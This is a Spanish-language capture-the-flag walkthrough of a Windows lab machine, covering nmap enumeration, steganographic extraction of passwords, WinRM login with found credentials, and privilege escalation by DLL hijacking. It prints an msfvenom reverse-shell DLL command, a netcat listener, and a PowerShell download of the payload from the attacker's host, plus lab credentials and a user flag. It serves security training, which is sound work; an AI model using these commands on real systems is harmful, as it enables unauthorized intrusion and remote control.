Welcome To The Jungle

Welcome To The Jungle
Sistema operativo Dificultad Fecha de Lanzamiento Creador
Windows Avanzado 30 Julio 2025 D4redevil

Enumeración inicial

Realizamos un escaneo con nmap para descubrir que puertos TCP se encuentran abiertos en la máquina víctima.

nmap -sS -p- --open -Pn -n --min-rate 5000 -oG openPorts -vvv 192.168.1.7
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-27 13:48 -03
Initiating ARP Ping Scan at 13:48
Scanning 192.168.1.7 [1 port]
Completed ARP Ping Scan at 13:48, 0.06s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 13:48
Scanning 192.168.1.7 [65535 ports]
Discovered open port 80/tcp on 192.168.1.7
Discovered open port 445/tcp on 192.168.1.7
Discovered open port 135/tcp on 192.168.1.7
Discovered open port 139/tcp on 192.168.1.7
Discovered open port 49671/tcp on 192.168.1.7
Discovered open port 49670/tcp on 192.168.1.7
Discovered open port 49666/tcp on 192.168.1.7
Discovered open port 49667/tcp on 192.168.1.7
Discovered open port 49668/tcp on 192.168.1.7
Discovered open port 49664/tcp on 192.168.1.7
Discovered open port 5985/tcp on 192.168.1.7
Discovered open port 49665/tcp on 192.168.1.7
Discovered open port 47001/tcp on 192.168.1.7
Completed SYN Stealth Scan at 13:48, 28.07s elapsed (65535 total ports)
Nmap scan report for 192.168.1.7
Host is up, received arp-response (0.0011s latency).
Scanned at 2025-07-27 13:48:02 -03 for 28s
Not shown: 65359 closed tcp ports (reset), 163 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE      REASON
80/tcp    open  http         syn-ack ttl 128
135/tcp   open  msrpc        syn-ack ttl 128
139/tcp   open  netbios-ssn  syn-ack ttl 128
445/tcp   open  microsoft-ds syn-ack ttl 128
5985/tcp  open  wsman        syn-ack ttl 128
47001/tcp open  winrm        syn-ack ttl 128
49664/tcp open  unknown      syn-ack ttl 128
49665/tcp open  unknown      syn-ack ttl 128
49666/tcp open  unknown      syn-ack ttl 128
49667/tcp open  unknown      syn-ack ttl 128
49668/tcp open  unknown      syn-ack ttl 128
49670/tcp open  unknown      syn-ack ttl 128
49671/tcp open  unknown      syn-ack ttl 128
MAC Address: 08:00:27:AD:53:B6 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 28.26 seconds
           Raw packets sent: 136357 (6.000MB) | Rcvd: 65373 (2.615MB)

Lanzamos una serie de script básicos de enumeración propios de nmap, para conocer la versión y servicio que esta corriendo bajo los puertos.

nmap -sCV -p80,135,139,445,5985,47001,49664,49665,49666,49667,49668,49670,49671 -oN servicesScan 192.168.1.7
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-27 13:49 -03
Nmap scan report for 192.168.1.7 (192.168.1.7)
Host is up (0.0010s latency).

PORT      STATE SERVICE       VERSION
80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-title: Welcome to the Jungle - The Hex Guns
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  msrpc         Microsoft Windows RPC
49671/tcp open  msrpc         Microsoft Windows RPC
MAC Address: 08:00:27:AD:53:B6 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
|_clock-skew: -1s
| smb2-time: 
|   date: 2025-07-27T16:50:52
|_  start_date: N/A
|_nbstat: NetBIOS name: THEHEXGUNS, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:ad:53:b6 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 59.42 seconds

Explotación inicial

HTTP (80)

Ingresamos a la web que esta corriendo bajo el puerto 80.

Welcome To The Jungle

Welcome To The Jungle

Si miramos el código fuente de albums.php encontramos un posible nombre de usuario.

Welcome To The Jungle

Realizmos web fuzzing

Welcome To The Jungle

Si hacemos fuzzing bajo el directorio /media y con extensión zip encontramos un archivo llamado songs.zip

Welcome To The Jungle

Descargamos el binario:

wget 192.168.1.7/media/songs.zip

Extraemos el contenido del zip

Welcome To The Jungle

Welcome To The Jungle

Utilizamos esteganografía para extraer el archivo passwords.txt de solo_final.wav

steghide extract -sf solo_final.wav

Welcome To The Jungle

La contraseña utilizada es: thehexguns (debemos usar un poco la creatividad y probar)

Welcome To The Jungle

Vemos que tenemos una contraseña nueva y un path.

Welcome To The Jungle

Accedemos a la nueva ruta y nos encontrams con un panel de login.

Welcome To The Jungle

Utilizamos las credenciales slash:sweetjungle2025

Ingresamos al panel

Welcome To The Jungle

Descargamos el binario.

Si analizamos el binario usando el comando strings podemos ver que hay unas credenciales hardcodeadas en el código.

axl:SoloMaster2025

Welcome To The Jungle

Nos conectamos a la máquina víctima a través del protocolo winrm

evil-winrm -i 192.168.1.7 -u axl -p SoloMaster2025

Leemos el flag de user.txt

Welcome To The Jungle

8f1aecc0263f4ccc3d67ac0bb6f218a9

Elevación de privilegios

Dll Hijacking

Si miramos dentro del directorio C:\Program Files\HexGuns nos encontramos con lo siguiente:

Welcome To The Jungle

Welcome To The Jungle

Si miramos los permisos del directorio HexGuns, vemos que todos los usuarios pueden escribir en este.

Welcome To The Jungle

Creamos una dll maliciosa la cual nos devuelva una reverse shell.

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.19 LPORT=443 -f dll -o config.dll

Welcome To The Jungle

Nos ponemos en escucha con netcat por el puerto 443

rlwrap nc -nlvp 443

La subimos a la máquina víctima.

Creamos un servidor http con Python.

python3 -m http.server 80

Descargamos la dll en la máquina y la guardamos en la ruta.

iwr -uri http://192.168.1.19/config.dll -o 'C:\Program Files\HexGuns\config.dll'

Esperamos unos minutos y deberíamos ganar acceso a la máquina víctima.

Welcome To The Jungle

Ya podemos leer el flag de root.

Welcome To The Jungle

¡Gracias por leer!

¡Happy Hacking!